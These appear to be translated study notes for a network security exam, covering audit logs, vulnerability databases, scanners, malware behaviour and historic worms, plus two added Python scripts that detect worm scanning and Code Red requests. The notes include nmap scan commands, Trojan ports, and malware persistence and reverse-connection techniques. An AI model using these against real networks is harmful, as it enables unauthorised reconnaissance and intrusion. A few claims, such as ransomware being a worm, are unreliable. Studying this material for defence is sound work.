The other is to centrally collect audit data from the various systems, establish an audit data storage server, and store the data in a dedicated storage device to facilitate subsequent query, analysis and electronic evidence collection.

Operating systems, databases and other systems set three types of users: operators, security officers and auditors.
The operator is only responsible for the operation and maintenance of the system, and the operation process is recorded in detail by the system;
the security officer is responsible for the configuration and maintenance of the system security policy;
the auditor is responsible for maintaining audit-related matters, and can view the work process logs of the operator and security officer. Operators cannot modify their own operation records, and auditors cannot operate the system.

Concept of network security audit:
• Network security audit refers to the work of obtaining, recording, storing,
analyzing and utilizing information on security-related activities of network information systems.

Log security audit: log collection, log storage, log analysis, log query, event warning, statistical report, system management.
Log analysis technology is widely used in computer crime investigation and electronic evidence collection. Many cases use log analysis technology to provide clues
and obtain evidence.

2. Classification by audit objects: operating system security audit, database security audit, network communication security audit, application system security audit, network security equipment audit, industrial control security audit, mobile security audit, Internet security audit, code security audit.

3. Linux audit logs:
boot.log: system boot log; acct/pacct: command operation log (records the commands each user runs); lastlog: last login log; loginlog: bad login records; sulog: log of su command use; utmp: currently logged-in users; wtmp: user login and logout log; messages: system messages; btmp: users who failed to log in; xferlog: FTP access log; vold.log: external media error information.
Syslog is the default log daemon in Linux systems. It can record local events or events on another host over the network.

4. Database audit methods:
Network monitoring audit: in-depth analysis of database network traffic and data packets to achieve access and control of the database. Encrypted data and local database operations cannot be audited.
Built-in auditing: the auditing system that comes with the database system. It has a certain impact on the performance of the database and can be easily deleted.
Database agent: install an agent on the database and use the agent to collect information for auditing. This has an impact on the performance and stability of the database.

5. GB17859 (Computer information security level protection classification criteria)


6. Network security audit mechanism types:
host-based, network communication-based, application-based.

China's national standard GB17859 "Guidelines for the Classification of Security Protection Levels of Computer Information Systems" (hereinafter referred to as the "Guidelines") requires the provision of audit security mechanisms starting from level two. The Guidelines clarify the requirements for auditing at each level, as shown in the table below.

Thirteen (Key Points): Network security loopholes are also called vulnerabilities.

Fuzz testing is a black box test that can discover software vulnerabilities without source code. It is an automated dynamic vulnerability mining technology that does not cause false positives and does not require a large amount of manual reverse analysis.

Security vulnerability analysis and vulnerability management are basic tasks of network security. The American company MITRE developed Common Vulnerabilities and Exposures (CVE) to unify and standardize vulnerability naming. MITRE has also established the Common Weakness Enumeration (CWE) to standardize and describe security vulnerabilities in software architecture, design, and coding. For the hazard assessment of security vulnerabilities, the Forum of Incident Response and Security Teams (FIRST) developed and released the Common Vulnerability Scoring System (CVSS). CVSS uses a ten-point scale to score and evaluate the severity of security vulnerabilities. The higher the score, the more harmful the vulnerability is.

CVSS is a universal vulnerability scoring system. The score is calculated from three groups: base metrics, temporal metrics, and environmental metrics. Taking CVSS v3.0 as an example, the base score is determined by attack vector, attack complexity, privileges required, user interaction, integrity impact, confidentiality impact, availability impact, scope and other parameters. The temporal score is determined by parameters such as exploit code maturity, remediation level, and report confidence. The environmental score is determined by the integrity requirement, confidentiality requirement, availability requirement, modified base metrics, etc.

CVE is a dictionary of security vulnerabilities built and maintained by the American company MITRE.
CVE provides a unified identification and standardized description of disclosed security vulnerabilities, and its goal is to facilitate the sharing of vulnerability data. A CVE entry contains an identification number, a brief description of the security vulnerability, and at least one public reference. The identification number is referred to as the CVE ID, and its format consists of a year number and other numbers. For example, CVE-2019-1543 is an OpenSSL security vulnerability number.

National Information Security Vulnerability Database CNNVD, National Information Security Vulnerability Sharing Platform CNVD.
CNVD divides vulnerabilities into 11 types according to their causes.
CNNVD has played a major role in the collection of information security vulnerabilities, the notification of major vulnerability information, and the elimination and control of high-risk vulnerabilities, providing important technical support and data support for the security of important national industries and critical infrastructure.

The CERT (Computer Emergency Response Team) organization was established in 1988. It is the world's first computer security emergency response organization. Its main task is to provide response and processing of intrusion incidents. Currently, the organization also releases vulnerability information.

The National Information Security Vulnerability Sharing Platform (CNVD) is an information security vulnerability sharing knowledge base established by the National Computer Network Emergency Response Technology Coordination Center in conjunction with important domestic information system units, basic telecommunications operators, network security vendors, software vendors and Internet companies.

There are four main sources of vulnerability information at home and abroad:
first, network security emergency response agencies;
second, network security manufacturers;
third, IT product or system providers;
fourth, network security organizations.

Host vulnerability scanners include COPS, Tiger, Microsoft Baseline Security Analyzer (MBSA), etc.
Among them, COPS (Computer Oracle and Password System) is used to check common security configuration issues and system defects of UNIX systems. Tiger is a vulnerability detection program based on shell scripts, used for configuration vulnerability inspection of UNIX systems. MBSA is a security baseline analysis tool for Windows systems.

To open Windows certificate management, run: certmgr.msc

1. Vulnerability patches can be divided into:
Zero-day vulnerabilities: newly discovered vulnerabilities for which no vulnerability patch has been released.
Common vulnerabilities: Vulnerability patches have been released and can be repaired.

Vulnerability Overview
Vulnerabilities are generally defects that cause network information system security policies to conflict. Such defects are often called security risks. The main impacts of security vulnerabilities include loss of confidentiality, integrity damage, reduced availability, loss of non-repudiation, reduced controllability, and loss of authenticity.

Foreign network security agencies have announced two types of CPU vulnerabilities, Meltdown and Spectre, triggering a global network security crisis. The vulnerabilities allow a program to steal data being processed on the computer. Security vulnerabilities at other levels have also been discovered.

Network security vulnerability management process:
asset confirmation,
vulnerability information collection,
vulnerability assessment,
vulnerability elimination and control,
vulnerability change tracking.

Vulnerability discovery methods: manual security analysis, tool automated detection, artificial intelligence-assisted analysis

Vulnerability discovery technology: text search, lexical analysis, range checking, state machine checking, error injection, fuzz testing, dynamic taint analysis, formal verification

2. Internet worm: sendmail and finger vulnerabilities.
Distributed denial-of-service attack: TCP/IP vulnerability.
Code Red worm: IIS 4.0/5.0 index service security vulnerability.
Slammer worm: MS SQL database system vulnerability.
Shockwave worm: DCOM RPC buffer vulnerability.
Stuxnet virus: Windows WinCC system vulnerability.
WannaCry ransomware: Windows SMB vulnerability.

3. Vulnerability classification standard:
Global: CVE vulnerability classification
CVSS vulnerability scoring system, which scores and grades according to different severity levels.
China's OWASP Top 10 vulnerability classification
China's information security vulnerability library CNNVD
China's information security vulnerability sharing platform CNVD

4. There are three types of vulnerability scanners:
Host vulnerability scanners: COPS, Tiger, and MBSA.
Network vulnerability scanners: Nessus, Nmap.
Dedicated vulnerability scanners: web, database server, industrial control.

Commonly used scanning software is divided into:
address scanner, port scanner, vulnerability scanner.

There are four types of harmful behaviors:
(1) Information leakage attack;
(2) Integrity destruction attack;
(3) Denial of service attack;
(4) Illegal use attack.

nmap without -p means all ports of all hosts:
nmap -sS 192.168.1.0/24          # half-open (SYN) TCP scan of the LAN
nmap -sT 192.168.1.0/24          # full-connect TCP scan of the LAN
nmap -sU 192.168.1.0/24          # UDP scan of the LAN
nmap -sU 192.168.1.1-20          # UDP scan of a specified address range
nmap -sP 192.168.1.1-20          # ICMP scan
nmap -sS -p <port> 192.168.1.1   # scan a port (<port> is a placeholder)
nmap -sC -sV -O 192.168.1.3      # check the target operating system type

5. Virtual patching protects objects that have not been patched. Other devices filter the network traffic that carries vulnerability attacks aimed at the vulnerable device, so that the protected object is protected without being patched. Examples are intrusion blocking, web firewall and other technologies.

6. There are six steps in network security vulnerability patching:
status analysis, patch tracking, patch verification, patch installation, emergency response, and patch inspection.

  1. The main sources of non-technical security vulnerabilities
    (1) The person responsible for network security is not clear.
    (2) The network security strategy is incomplete.
    (3) Insufficient network security operation skills.
    (4) Lack of network security supervision.
    (5) Incomplete network security privilege control.
  2. The main source of technical security vulnerabilities
    (1) Design Error.
    (2) Input Validation Error.
    (3) Buffer Overflow.
    (4) Exceptional Condition Handling Error.
    (5) Access Validation Error.
    (6) Configuration Error.
    (7) Race Condition.
    (8) Condition Error.

Web application vulnerability checking function.
Ability to detect SQL injection, cross-site scripting, website Trojans, web Trojans, CGI vulnerabilities, etc.

Common products are in the form of IPS (Intrusion Prevention System), Web Firewall (WAF), Unified Threat Management (UTM), etc.

Unified threat management (UTM for short) usually integrates functional modules related to intrusion detection systems and is one of the forms that intrusion detection technology products take. Unified threat management is a specialized device composed of hardware, software and network technology. The device mainly provides one or more security functions and integrates multiple security features into one hardware device to form a standard unified threat management platform. It integrates multiple security functions through unified deployment of security policies, and is a gateway device or system that comprehensively defends against security threats to networks and application systems. UTM is usually deployed at the boundary between the internal network and the external network to protect and control data flowing out of and into the internal network. UTM deployment modes in real networks usually include transparent bridge, route forwarding, and NAT gateway.
Advanced Persistent Threat (APT) is a sophisticated attack technology that usually embeds malicious code in Word documents, Excel documents, PPT documents, PDF documents or emails to achieve more covert network attacks and evade common network security checks. For example, the Donot organization has a decoy vulnerability document named after the "Kashmir Issue", which exploits the CVE-2017-8570 vulnerability. Its main attack process is shown in Figure 10-9.
The advanced persistent threat detection system is a special form of intrusion detection technology product. Its product technology principle is based on static/dynamic analysis to detect suspicious malicious electronic files and correlation analysis of network security big data to discover advanced persistent threat activities.

Network security vulnerability exploitation prevention technology
1. Address space randomization technology - randomizes the memory address where the program is loaded, so that the attacker cannot determine the return address of the program in advance.
2. Data execution prevention - the operating system marks specific memory areas as non-executable, so that code cannot run in the specified memory areas.
3. SEHOP - prevents attackers from using SEH overwrites.
4. Stack protection - sets a stack integrity flag to check whether the function call return address has been tampered with, thereby preventing attackers from exploiting buffer vulnerabilities.
5. Virtual patches

The full name of SEHOP is Structured Exception Handler Overwrite Protection. An SEH attack uses carefully constructed data to overwrite one or more nodes on the structured exception handling list through a stack overflow or other vulnerability, thereby controlling EIP (controlling program execution flow). SEHOP is a security protection solution proposed by Microsoft against this kind of attack.

Fourteen (Key Points): Malicious code types include (only worms spread actively, others are passive):
viruses, worms, Trojan horses, logic bombs, bacteria, malicious scripts, malicious ActiveX controls, and spyware.

Malicious code survival technologies include: anti-tracking technology, encryption technology, fuzzy transformation technology, deformation technology, automatic production technology, three-thread technology, process injection technology, and communication hiding technology.

Channel hiding technology backdoors include: BO2K, Code Red II, Nimda, Covert TCP.
Glacier uses port 7626; Back Orifice uses port 54320;
Executor uses port 80 to transfer control information and data;
the FTP trojan WinCrash uses port 21;
the WinPC and WinSpy Trojans use port 25.

Malicious code detection: rootkit, ClamAV
File security check: md5sum, Tripwire

Rootkits are typical Trojan horses with hiding capabilities. Currently, there are three types of techniques for detecting rootkits, described as follows:
The first type is to detect known rootkits. This method uses the running trace characteristics of rootkits to determine whether there are Trojans in the computer system. The main disadvantage of this method is that it can only target specific known rootkits, and it is almost powerless against unknown rootkits.
The second type is analysis and detection based on execution paths.
The third type is analysis and detection that directly reads kernel data. This method targets rootkits that hide themselves by modifying kernel data structures. The basic principle is to read the internal data in the kernel directly to determine the current status of the system.

Logic bombs, bacteria, malicious scripts, malicious ActiveX controls, and spyware.

Malicious code definition: malicious code is program code that violates the security policy of the target system. It can cause information leakage, resource abuse, and damage to the integrity and availability of the system.

Malicious code attack technology: process injection technology, super management technology, port reverse link technology, buffer overflow attack technology

Common attack techniques:
port scanning, password cracking, buffer overflow, malicious code, denial of service, phishing, network eavesdropping, SQL injection, social engineering, electronic monitoring, session hijacking, vulnerability scanning, proxy technology, and data encryption.

Trojan horse prevention technology:
• Trojan horse detection technology based on viewing open ports
• Trojan horse detection technology based on important system files
• Trojan horse detection technology based on the registry
• Technology for detecting Trojan horses with hiding capabilities
• Network-based Trojan horse detection technology
• Network-based Trojan horse blocking technology
• Trojan horse removal technology

Network worm prevention technology
• Network worm monitoring and early warning technology - installation of detectors
• Network worm propagation suppression technology - honeypots
• Network system vulnerability detection and system reinforcement technology
• Network worm immunity technology - deception
• Network worm blocking and isolation technology - routers, firewalls
• Network worm removal technology - delete files, registry entries, and processes

2. Six steps of malicious code behavior:

Intrude, elevate privileges, conceal, lurk, sabotage, repeat the above actions.
3. To protect the malicious code itself, use anti-tracking technology (anti-dynamic tracking and anti-static tracking) to improve its camouflage and anti-cracking capabilities.

3. Two methods of malicious code analysis:
static analysis: anti-malware code software inspection, string analysis, and static decompilation analysis.
Dynamic analysis: file monitoring, process monitoring, registry monitoring, dynamic disassembly analysis.

Characteristics of malicious code: concealment, contagiousness, and latent nature

4. Computer viruses have four characteristics: concealment, contagiousness, latent nature and destructiveness.

Computer virus life cycle:
latent stage, propagation stage, trigger stage, attack stage

5. Computer viruses consist of three parts: replicating infectious components, hidden components, and destructive components.

Virus life cycle stages: replication and propagation stage, activation and execution stage

Three technical methods to defend against unknown viruses: active defense, cloud scanning, and AI scanning.

6. Trojan attack steps: find the target, collect target information, implant the Trojan, hide the Trojan, and realize the intention.

A network worm is a malicious program that has the ability to replicate and propagate itself, and can run independently and automatically.

According to the way network worms discover susceptible hosts, network worm propagation methods can be divided into three categories: random scanning, sequential scanning, and selective scanning.

7. The worm has four functional modules:
Detection module: detects the vulnerability of the target host.
Propagation module: generates copies of the worm and transmits them between different hosts.
Worm engine module: uses algorithms to collect information from the target host.
Payload module: pseudocode implemented inside the worm.

Worm propagation method: random scanning, sequential scanning, selective scanning.
The "Slammer" worm's propagation method is to use random scanning to infect hosts.
"W32.Blaster" is a typical sequential scanning worm.
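How the difference between sequential and random scanning shows up to a defender, as an added example that is not part of the original notes: a Python check over constructed flow records that flags sources fanning out to many hosts on one port and labels the pattern. The addresses, thresholds and function name are assumptions; the ports are the ones these notes give for Blaster (TCP/135) and Slammer (1434, UDP assumed).

```python
# Added example: label fan-out scanning in flow records as sequential or not.
import ipaddress
from collections import defaultdict

# Constructed flow records in time order:
# (source IP, protocol, destination IP, destination port).
SAMPLE_FLOWS = (
    # Source walking consecutive addresses on TCP/135, with one repeated target.
    [("10.0.0.5", "tcp", "172.16.0.%d" % n, 135) for n in range(10, 20)]
    + [("10.0.0.5", "tcp", "172.16.0.12", 135)]
    # Source hitting scattered addresses on UDP/1434.
    + [("10.0.0.9", "udp", dst, 1434) for dst in (
        "198.51.100.77", "172.16.9.3", "203.0.113.200", "192.0.2.14",
        "172.16.40.91", "198.51.100.5", "203.0.113.8", "192.0.2.250")]
    # Ordinary client talking to two servers: not a scan.
    + [("10.0.0.20", "tcp", "172.16.0.80", 443),
       ("10.0.0.20", "tcp", "172.16.0.81", 443)]
)


def classify_scanners(flows, min_targets=8, sequential_ratio=0.8):
    """Return {(src, proto, port): label} for sources contacting many hosts on one port.

    min_targets and sequential_ratio are illustrative thresholds, not tuned values.
    A source is 'sequential' when most consecutive new targets differ by exactly one
    address; anything else is reported as 'random-or-selective', because flow data
    alone cannot separate those two strategies.
    """
    targets = defaultdict(list)
    for src, proto, dst, port in flows:
        targets[(src, proto, port)].append(int(ipaddress.ip_address(dst)))

    verdicts = {}
    for key, addrs in targets.items():
        distinct = list(dict.fromkeys(addrs))      # drop repeats, keep first-seen order
        if len(distinct) < min_targets:
            continue                               # too few targets to call it a scan
        steps = [b - a for a, b in zip(distinct, distinct[1:])]
        in_order = sum(1 for step in steps if step == 1)
        ratio = in_order / len(steps)
        verdicts[key] = ("sequential" if ratio >= sequential_ratio
                         else "random-or-selective")
    return verdicts


if __name__ == "__main__":
    for (src, proto, port), label in sorted(classify_scanners(SAMPLE_FLOWS).items()):
        print("%s -> %s/%d: %s scanning" % (src, proto, port, label))
```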

Ransomware belongs to the worm class.

8. The worm runs in three stages:
A host that has already been infected with the worm searches for other susceptible hosts.
It sends the worm code to the susceptible hosts using ftp, tftp, share, etc.
After the worm code is successfully uploaded to the target, the newly infected host continues with the first step, the second step, and so on.


In current network and distributed system security, more than 50% of widely exploited vulnerabilities are buffer overflows. The most famous example is the worm that exploited the fingerd vulnerability in 1988. Among buffer overflows, the most dangerous is the stack overflow, because an intruder can use a stack overflow to change the return address used when the function returns, making the program jump to an arbitrary address. One hazard is that the program crashes and causes denial of service; the other is a jump to a piece of malicious code, such as one that obtains a shell and then does whatever it wants.

9. SQL Slammer (2003): Slammer is a DDoS malicious program that uses random scanning. It uses a new infection method to hit servers with distributed denial-of-service attacks: it exploits a weakness in SQL Server, attacks port 1434, and infects SQL Server in memory. The infected SQL Server then sends out large volumes of denial-of-service traffic and further infections, leaving SQL Server unable to operate normally or crashing it and congesting the internal network. Like Code Red, it resides only in the memory of the compromised server.
Because the SQL Slammer outbreak occurred on a Saturday, the monetary damage was not large. Even so, it affected about 500,000 servers around the world and paralyzed South Korea's network for 12 hours.
SQL Slammer, also known as "Sapphire", first appeared on January 25, 2003. It is an unusual worm that had a significant negative impact on Internet traffic. Interestingly, its target is not end users' computers but servers. It is a single-packet, 376-byte worm that randomly generates IP addresses and sends itself to them. If an IP address happens to belong to a computer running an unpatched version of Microsoft's SQL Server Desktop Engine software, that computer too quickly starts sending the worm to random IP addresses.


10. W32.Blaster.Worm is a worm that scans sequentially and uses the DCOM RPC vulnerability to propagate. It spreads aggressively; for a detailed description, refer to Microsoft Security Bulletin MS03-026. Infection may cause system instability and system crashes. The port it scans is TCP/135. After a successful infection, it uses TCP port 4444 and UDP port 69 to download and run its program, Msblast.exe. The worm also performs a denial-of-service attack on windowsupdate.com.
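The two scanning strategies above look different in flow logs: a sequential scanner such as Blaster walks neighbouring addresses on TCP/135, while a random scanner such as Slammer sprays unrelated addresses on UDP/1434. The following detection sketch is an added example, not part of the original notes; the flow records, thresholds and function names are constructed assumptions.

```python
import ipaddress
from collections import defaultdict

# Ports named in the notes: Slammer probes UDP/1434, Blaster probes TCP/135.
WATCHED_PORTS = {("udp", 1434), ("tcp", 135)}

# Constructed flow records in arrival order: (source, destination, protocol, port).
# Every address is from a documentation range; this is not captured traffic.
FLOWS = (
    [("192.0.2.10", f"198.51.100.{i}", "tcp", 135) for i in range(1, 13)]
    + [("192.0.2.20", dst, "udp", 1434) for dst in (
        "203.0.113.77", "198.51.100.4", "203.0.113.9", "192.0.2.201",
        "198.51.100.130", "203.0.113.240", "192.0.2.66", "198.51.100.18",
        "203.0.113.151", "192.0.2.139")]
    + [("192.0.2.30", "198.51.100.5", "tcp", 135),
       ("192.0.2.30", "198.51.100.6", "tcp", 135)]
)


def classify_scan(destinations, min_targets=8, seq_ratio=0.8):
    """Label an ordered destination list 'sequential', 'random' or None.

    min_targets and seq_ratio are assumed thresholds, not values from the notes.
    """
    addrs = [int(ipaddress.IPv4Address(d)) for d in destinations]
    if len(set(addrs)) < min_targets:
        return None  # too few distinct targets to call it a scan
    steps = [b - a for a, b in zip(addrs, addrs[1:])]
    unit_steps = sum(1 for s in steps if s == 1)
    # A sequential scanner walks the address space one address at a time.
    return "sequential" if unit_steps / len(steps) >= seq_ratio else "random"


def detect_scanners(flows):
    """Group probes per (source, protocol, port) and classify each group."""
    probes = defaultdict(list)
    for src, dst, proto, port in flows:
        if (proto, port) in WATCHED_PORTS:
            probes[(src, proto, port)].append(dst)
    alerts = {}
    for key, dests in probes.items():
        verdict = classify_scan(dests)
        if verdict is not None:
            alerts[key] = verdict
    return alerts


if __name__ == "__main__":
    for (src, proto, port), verdict in detect_scanners(FLOWS).items():
        print(f"{src} -> {proto}/{port}: {verdict} scan")
```

The third source in the sample contacts only two hosts on TCP/135 and is not flagged, which is the case a fan-out threshold exists to handle.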

11. Code Red: The "Code Red" virus is a network worm discovered on July 15, 2001 that infects computers running the Microsoft IIS Web server. The technology used in its spread fully reflects the combination of network security and viruses in the Internet era. It integrates network worms, computer viruses, and Trojan horse programs, creating a new way for network viruses to spread, and can be called an epoch-making virus. If slightly modified, it would be a very deadly virus: it can obtain all the permissions of the compromised computer and do whatever it wants, stealing confidential data and seriously threatening network security.
The "Code Red" worm uses a technique called "buffer overflow" and exploits a vulnerability in Microsoft IIS to infect and spread. The virus uses the HTTP protocol to send a GET request containing a large number of garbled characters to port 80 of the IIS server. The purpose is to overflow a system buffer and obtain superuser privileges; it then continues to use HTTP to send the ROOT.EXE Trojan program to the system and run it there, which lets the virus reside in the system's memory and continue to infect other IIS systems. When Code Red sends the garbled GET request to the victim, it always puts a file name with the suffix .ida before the garbled characters, indicating that it is requesting that file. This is an important feature of Code Red.
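The .ida feature described above can be turned into a log check. The following sketch is an added example, not part of the original notes: it scans web server access logs in Common Log Format for GET requests whose path ends in .ida and whose query string is unusually long. The log lines, the "A" filler and the length threshold are constructed assumptions.

```python
import re
from urllib.parse import urlsplit

# Common Log Format: host ident user [time] "METHOD target PROTOCOL" status size
CLF = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3}) \S+$')

# Constructed sample lines; the "A" filler only stands in for the garbled
# characters and is not the content of a real request.
LOG_LINES = [
    '192.0.2.44 - - [19/Jul/2001:10:12:01 +0000] "GET /index.html HTTP/1.0" 200 1043',
    '198.51.100.23 - - [19/Jul/2001:10:12:07 +0000] "GET /default.ida?'
    + "A" * 224 + ' HTTP/1.0" 404 -',
    '192.0.2.44 - - [19/Jul/2001:10:12:09 +0000] "GET /search.ida?q=report HTTP/1.0" 200 512',
    '203.0.113.8 - - [19/Jul/2001:10:12:15 +0000] "GET /SCRIPTS/Default.IDA?'
    + "A" * 300 + ' HTTP/1.0" 200 -',
    'not a log line',
]


def find_ida_probes(lines, max_query=100):
    """Return (client, path, query length, status) for suspicious .ida requests.

    max_query is an assumed threshold: a legitimate .ida request carries a
    short query, while the request described in the notes carries a long one.
    """
    hits = []
    for line in lines:
        match = CLF.match(line)
        if match is None:
            continue  # skip lines that are not in Common Log Format
        client, method, target, status = match.groups()
        parts = urlsplit(target)
        # The suffix check is case-insensitive, as IIS paths are.
        if (method == "GET"
                and parts.path.lower().endswith(".ida")
                and len(parts.query) > max_query):
            # The status is kept so triage can separate rejected probes
            # from requests the server actually answered.
            hits.append((client, parts.path, len(parts.query), int(status)))
    return hits


if __name__ == "__main__":
    for client, path, qlen, status in find_ida_probes(LOG_LINES):
        print(f"{client} requested {path} with a {qlen}-byte query (HTTP {status})")
```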

12. "Chinese hackers" (using three-thread technology): This virus is a worm. It does not infect executable files.
During activation, the virus copies itself to the Windows system directory: to windows\system\runouce.exe on Windows 9x systems and to winnt\system32\runouce.exe on Windows 2000 and Windows NT systems. It then runs the program and adds it to the registry as a self-starting entry, so the virus is activated every time the computer is turned on.
This virus is transmitted through email and has a self-starting function: it starts automatically as soon as it is clicked in Outlook. The virus copies itself to the Windows\system 32 directory, names the copy Runouce.exe, and starts this file. After startup, the virus creates two threads. In addition to the ordinary thread, there is also a kernel thread, which tracks and monitors the ordinary thread. Once the ordinary thread is killed, the kernel thread immediately creates a new ordinary thread. Therefore, ordinary anti-virus software cannot completely remove it.
This virus also uses local area networks very effectively to spread. Once it enters a machine on the LAN, it immediately searches for shared folders in "My Network Places". Whenever it finds a writable shared folder, it generates an .eml file whose name starts with the name of the infected machine, so in the end all machines on the LAN become "sending bases" for virus emails.

6. Three-thread technology
Three-thread technology is used in malicious code to prevent the malicious code from being stopped by external operations.
The working principle of three-thread technology is that a malicious code process opens three threads at the same time. One is the main thread, responsible for remote control work; the other two, a monitoring thread and a daemon thread, are responsible for checking whether the malicious code program has been deleted or stopped from starting. The daemon thread is injected into another executable file and kept in sync with the malicious code process. As soon as the process is stopped, the daemon thread restarts it and provides the necessary data to the main thread, allowing the malicious code to continue running. "Chinese hackers" is malicious code that uses this technique.

13. Morris Worm: Its author is Robert Morris, a first-year graduate student at Cornell University in the United States. This program only has 99 lines. It takes advantage of the shortcomings of the Unix system. It uses the Finger command to check the list of online users, then deciphers the user password, uses the Mail system to copy and spread its own source program, and then compiles and generates code. The original network worm was designed to "wander" between computers when the network is idle without causing any damage. When a machine is overloaded, the program can "borrow resources" from idle computers to achieve load balancing on the network. The Morris worm does not "borrow resources" but "exhausts all resources." It was the first worm to spread over the Internet.

14. Botnet: A botnet is a network formed when attackers use one or more means of propagation to infect a large number of hosts with a bot program through various channels, and the infected hosts receive the attacker's instructions through a control channel. The botnet is then used to attack other targets. Honeypot technology is usually used for defense.

The main construction methods of botnets include remote vulnerability attacks, weak password scanning intrusions, email attachments, malicious documents, file sharing, etc. Early IRC botnets were mainly constructed using worm-like active scanning combined with remote vulnerability attacks. Currently, attackers construct botnets by means of web page Trojans (such as drive-by download).

The operating mechanism of the botnet mainly consists of three basic links.
The first step is the spread of bots. By exploiting computer network system vulnerabilities, social engineering, criminal toolkits, etc., the bots are spread to computers on the target network.
The second step is to perform remote command operations and control on the zombie program and form a network of victimized target machines. Botnets can be divided into centralized and distributed. The communication protocols between the bot and the control end include IRC and HTTP.
In the third step, the attacker sends attack instructions to the bot program through the botnet's control server and performs attack activities, such as sending spam emails, DDoS attacks, etc.

In order to protect its own security, the botnet uses an encryption mechanism for communication between the control server and the bot program, and embeds the communication content into normal HTTP traffic to protect the concealment and anonymity of the server. Control servers and bots also use authentication mechanisms to prevent control message forgery and tampering.

Botnet defense methods:

  1. Botnet threat monitoring
    Honeypot technology is usually used to obtain botnet threat information: deploy multiple honeypots to capture spreading bots, record each bot's network behavior, then manually analyze the network logs and combine them with sample analysis results to determine the properties of the bot, including the server it connects to (DNS/IP), port, channel, password, control password and other information, thereby obtaining basic information about the botnet and even control of it.
  2. Botnet detection
    Detect abnormal traffic in the network based on the communication content and behavioral characteristics of botnets in order to discover them.
  3. Active containment of botnets
    Block malicious IP addresses or domain names through routing and DNS blacklists.
  4. Bot program detection and removal
    Install special security tools on the victimized target machine to eliminate bot programs.

15. Logic bomb: malicious code attached to software.

16. Trapdoor: A maintenance backdoor left by equipment developers for the convenience of maintenance.
Trapdoors do not have automatic propagation and self-replication functions.

17. Bacteria: Programs with the ability to replicate.

18. Malicious code monitoring: IDS, network security analyzer.
The most effective defense against malicious code is patching.

19. APT: Advanced persistent threat: uses email to attack target hosts.
Advanced persistent threats (APTs) often use email as the way into a target system. An attacker embeds malicious code in an email and sends it to a target group, tricking the recipients into opening a malicious electronic document or clicking a link to a malicious site. Once a recipient is deceived, the malicious code is installed on the recipient's computer, giving the attacker remote control of it, and the attacker then gradually infiltrates the recipient's network to achieve the attack intent.
To counter these characteristics of advanced persistent threat attacks, deploy an APT detection system that detects malicious code in electronic documents and emails, preventing attackers from penetrating and invading the network through emails and electronic documents.


Overall protection includes four aspects: operation support, attack prevention, security monitoring, and emergency response.

Anti-tracking technology can be roughly divided into two categories: anti-dynamic tracking technology and anti-static analysis technology.
1) Anti-dynamic tracking technology
• Disable tracking interrupts.
• Detect tracking.
• Other methods, such as the instruction flow queue method and the reverse instruction flow method.
2) Anti-static analysis technology
• Block-encrypted execution of program code.
• Directive method.

There are three encryption methods, namely information encryption, data encryption and program code encryption.

Cascade is the first example of malicious code in a DOS environment that uses encryption technology. Its decryptor is stable and can decrypt the encrypted program body in memory. Mad and Zombie are extensions of Cascade encryption technology, extending malicious code encryption technology to 32-bit operating system platforms. In addition, "China bomb" and "ghost virus" are also malicious codes of this type.

Process injection technology embeds the malicious code program in service-related executable code and uses that code as a carrier to hide and launch itself. This type of malicious code only needs to be installed once; after that it is loaded into the system by the service, runs, and remains active all the time.

"Guangwai Girls" is a domestic Trojan horse that uses super management technology to carry out denial-of-service attacks on "Kingsoft Drug Tyrant" and "Skynet Firewall".

With port reverse connection technology, the malicious code makes the attacked server (the controlled end) actively connect to a port on the client (the control end). The earliest Trojan program to implement this technology is the foreign "Boinet", which can contact the client through four methods: ICO, IRC, HTTP and reverse active connection.

"Network Thief" is China's earliest malicious code that implements port reverse connection technology. "Gray Pigeon" is the master of this technology. It has three built-in server-side online notification functions: FTP, domain name, and server-side active connection.

Static analysis of malicious code mainly includes the following methods:
(1) Detection and analysis with anti-malicious-code software
(2) String analysis
(3) Script analysis
(4) Static decompilation analysis
(5) Static disassembly analysis

Dynamic analysis of malicious code mainly includes the following methods:
1. File monitoring
2. Process monitoring
3. Network activity monitoring
4. Registry monitoring
5. Dynamic decompilation analysis


15. IPS and SPS functions (SPS refers to a bypass-deployed IPS):
block specified IP addresses, block specified ports, block specified domain names, and provide hot patches for zero-day vulnerabilities.

The basic working principle of IPS is to control packet forwarding by judging attack behaviors based on the characteristics and context of network packets. Its working mechanism is similar to that of a router or firewall, but IPS can detect attack behaviors and block intrusion behaviors. IPS should

Intrusion blocking is a technical method of active network security defense. Its basic principle is to protect the target object by blocking network attacks against it.

The main security functions of IPS/SPS are as follows:
• Block specified IP addresses;
• Block specified network ports;
• Block specified domain names;
• Block command URLs and block specific attack types;
• Provide hot patches for zero-day vulnerabilities.

Hot patch: A hot patch, also known as a patch, is code that repairs software vulnerabilities. It is a quick and low-cost way to repair defects in a released software version. Users are notified of hot patches via email or other channels, and patches can generally be downloaded for free from the software vendor's website. Compared with upgrading the software version, the main advantage of hot patching is that it does not interrupt the services currently running on the device: the defects of the device's current software version can be repaired without restarting the device.

The China Anti-Network Virus Alliance (ANVA) hosted and built a network security threat information sharing platform to make it easier for enterprises to share threat information.
The China Anti-Network Virus Alliance (ANVA) took the lead in the construction. Focusing on the three key aspects of App development, dissemination and terminal protection, it guides App developers, mobile application stores and terminal security software to carry out self-discipline work, providing netizens with a safe App usage environment and helping them avoid infection with mobile malicious programs.

The mobile Internet whitelist application review process has the following three links:
• Initial review. The "Whitelist Working Group", composed of 11 mobile Internet security companies, independently conducts full security inspections of the App.
• Review. The member units of the "Whitelist Working Group" negotiate and vote in offline meetings based on the results of the initial review.
• Final judgment. ANVA comprehensively determines whether the App has passed the "whitelist" certification based on the results of the initial review, the results of the review, and the applicant's clarification.

The release process of the mobile Internet application self-discipline whitelist has two stages: publicity and release. During the publicity stage, ANVA releases the "whitelist" certification results to the public. The publicity period is 7 working days, during which it receives public reports. For Apps that have passed the publicity stage, ANVA holds a "Whitelist Conference" and issues certificates to the "Whitelist Apps" on-site. At the same time, the app stores in the "App Store Self-Discipline Group" are required to provide eye-catching reminders for whitelisted Apps on their own app store websites and App clients.

2. Network traffic cleaning: (traffic detection, traffic diversion and cleaning, traffic reinjection)
Traffic detection: uses DPI (deep packet inspection) technology.
Traffic diversion and cleaning: when a network attack is detected, BGP or DNS is used to divert the data packets to the cleaning center.
Traffic reinjection: the cleaned, normal network traffic is sent on to the target host.

DPI technology adds analysis to the application layer based on packet header analysis, and is based on application layer traffic detection and control technology.

2. What are the network traffic cleaning applications:
